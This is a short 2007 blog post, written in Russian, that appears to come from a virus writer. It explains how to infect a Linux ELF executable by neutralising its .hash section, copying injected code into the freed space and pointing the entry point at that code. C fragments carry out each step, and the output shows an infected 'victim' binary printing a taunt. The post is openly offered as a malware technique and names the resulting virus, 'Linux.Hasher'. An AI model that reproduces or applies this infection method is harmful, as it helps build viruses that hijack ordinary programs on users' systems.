herm1t LIVE!ng room - September 26th, 2007

herm1t LIVE!ng room - September 26th, 2007

herm1t

[	website	\|	twilight corner in the herm1t's cave	]
[	userinfo	\|	ljr userinfo	]
[	archive	\|	journal archive	]

September 26th, 2007

Waka waka bang splat tick tick hash

[Sep. 26th, 2007|06:09 pm]

[

Current Mood

excited

]

Изрядное количество места в ELF файле занимает .hash. Оно нам надо?

Найдем секцию .hash:

        FOR_EACH_SHDR
                if (shdr->sh_type == SHT_HASH) {
                        sh = shdr;
                        break;
                }
        ASSERT(sh != NULL);
        ASSERT(code_len < sh->sh_size - 12);
        uint32_t *hash = (uint32_t*)(m + sh->sh_offset);

nbuckets = 1, buckets[0] = 0 (no match ;-)

        hash[0] = 1;
        hash[2] = 0;

Используем освободившееся место по-своему:

        memcpy(&hash[3], code, code_len);
        ehdr->e_entry = sh->sh_addr + 12;

./victim
ALL YOUR BASE ARE BELONG TO US!
Срд Сен 26 18:27:04 EEST 2007

UPD Linux.Hasher

Link

4 comments|Leave a comment

navigation

[	viewing	\|	September 26th, 2007	]
[	go	\|	Previous Day\|Next Day	]